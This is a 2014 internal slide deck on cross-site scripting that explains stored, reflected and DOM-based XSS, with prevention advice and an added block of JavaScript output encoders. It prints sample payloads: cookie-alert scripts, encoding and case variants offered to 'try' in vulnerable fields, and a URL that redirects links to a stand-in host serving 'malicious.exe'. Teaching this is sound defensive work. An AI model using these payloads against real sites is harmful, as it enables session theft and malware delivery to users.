Post on 08-Jun-2015
TechTalk
FEBRUARY 2014
Cross Site Scripting XSS
DEPARTMENT: ARCHITECTURE AND DEVELOPMENT
Table of Contents
» Introduction
» Stored XSS
» Reflected XSS
» DOM Based XSS
» XSS Attack Consequences
» How to Protect Yourself
Introduction
https://www.owasp.org/index.php/Top_10_2013-Release_Notes
Introduction
» XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping.
» It allows attackers to execute scripts in the victim's browser, which can:
  » hijack user sessions,
  » deface web sites, or
  » redirect the user to malicious sites.
Introduction
https://www.youtube.com/watch?v=_Z9RQSnf8-g
Stored XSS Attacks
» The injected code is permanently stored on the target servers:
  » Database
  » Message forum
  » Visitor log
  » Comment field
  » …
» The victim then retrieves the malicious script from the server when it requests the stored information.
Stored XSS Attacks
Test XSS, <script>alert(document.cookie)</script>
Reflected XSS Attacks
» The injected code is reflected off the web server, such as in:
  » An error message
  » Search result
  » An e-mail message
  » Or any other response that includes some or all of the input sent to the server as part of the request
Reflected XSS Attacks
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
Reflected XSS Attacks
Different syntax or encoding
Try to write this script in vulnerable input fields:
" onfocus="alert(document.cookie)
"><script >alert(document.cookie)</script >
"%3cscript%3ealert(document.cookie)%3c/script%3e
"><ScRiPt>alert(document.cookie)</ScRiPt>
DOM Based XSS
» The DOM, or Document Object Model,
  » is the structural format used to represent documents in a browser.
  » is the de-facto name for XSS bugs
<script>document.write("Site is at: " + document.location.href + ".");</script>
XSS Attack Consequences
» The consequence is the same regardless of whether it is stored, reflected or DOM based.
» The most severe XSS attacks involve disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account.
» It can also include:
  » the disclosure of end user files
  » installation of Trojan horse programs
  » redirecting the user to some other page or site
  » modifying the presentation of content.
How to Protect Yourself
» Escape Output Provided by Users
  HTML encode any <, >, &, ', " or don't allow it
» Validate user data to make sure it meets your expectations
  Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way
Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes
String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );
JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values
String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
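The three escaping contexts from this slide, as an added example in plain JavaScript (not the slides' own code and not ESAPI): an HTML-body, an HTML-attribute and a JavaScript-value encoder, each applied in its own context to the payloads shown on the Stored and Reflected XSS slides. The function names and the small render template are my own assumptions.

```javascript
// Added example, not from the original slides: context-aware output encoding
// mirroring the encodeForHTML / encodeForHTMLAttribute / encodeForJavaScript
// contexts named on the "How to Protect Yourself" slide. Names are my own.

// HTML body context: entity-encode the five characters the slide lists.
function encodeForHTML(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context: encode everything but [A-Za-z0-9] as &#xHH; so the
// value can neither close the quoted attribute nor add an event handler
// (the '" onfocus="alert(document.cookie)' payload from the Reflected slide).
function encodeForHTMLAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '&#x' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0') + ';');
}

// JavaScript data value context: \xHH (or \uHHHH) so the value cannot
// terminate the string literal it is placed into or smuggle in </script>.
function encodeForJavaScript(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).toUpperCase().padStart(2, '0')
      : '\\u' + code.toString(16).toUpperCase().padStart(4, '0');
  });
}

// Hypothetical server-side template that lands one untrusted value in three
// contexts; each context gets its own encoder, never one generic encoder.
function renderProfile(untrusted) {
  return '<span title="' + encodeForHTMLAttribute(untrusted) + '">' +
         encodeForHTML(untrusted) + '</span>\n' +
         '<script>var name = "' + encodeForJavaScript(untrusted) + '";</script>';
}

// Constructed test input: the payloads from the Stored and Reflected XSS slides.
const PAYLOADS = [
  'Test XSS, <script>alert(document.cookie)</script>',
  '" onfocus="alert(document.cookie)',
  '"><ScRiPt>alert(document.cookie)</ScRiPt>',
];

// True when the rendered markup contains only the template's own structure:
// exactly one "<script" (ours) and exactly the four double quotes we emitted.
function rendersSafely(untrusted) {
  const html = renderProfile(untrusted);
  const scriptTags = (html.match(/<script/gi) || []).length;
  const quotes = (html.match(/"/g) || []).length;
  return scriptTags === 1 && quotes === 4;
}
```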
Thank you for your attention!
Additional Information
» OWASP YouTube Channel: https://www.youtube.com/watch?v=_Z9RQSnf8-g
» OWASP: https://www.owasp.org/index.php/XSS
  https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
» OWASP Protect ME: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
» Obscurity by Security, and Other Techitudes by Adam Jon R.: http://adamjonrichardson.com/2012/02/01/improving-xss-cross-site-scripting-prevention-in-four-simple-steps/